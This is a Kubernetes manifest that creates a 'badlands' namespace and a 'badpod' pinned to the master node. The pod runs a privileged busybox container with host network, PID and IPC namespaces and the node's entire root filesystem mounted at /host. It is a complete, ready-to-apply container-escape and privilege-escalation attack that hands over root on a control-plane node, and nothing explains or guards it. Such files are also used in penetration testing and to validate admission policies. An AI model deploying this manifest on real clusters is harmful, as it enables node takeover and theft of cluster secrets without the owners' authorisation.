apiVersion: v1
kind: Namespace
metadata:
  name: badlands
---
apiVersion: v1
kind: Pod
metadata:
  name: badpod
  namespace: badlands
  labels:
    type: bad-pod
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  nodeSelector:
    node-role.kubernetes.io/master: "true"
  containers:
  - name: noderootpod
    image: busybox
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /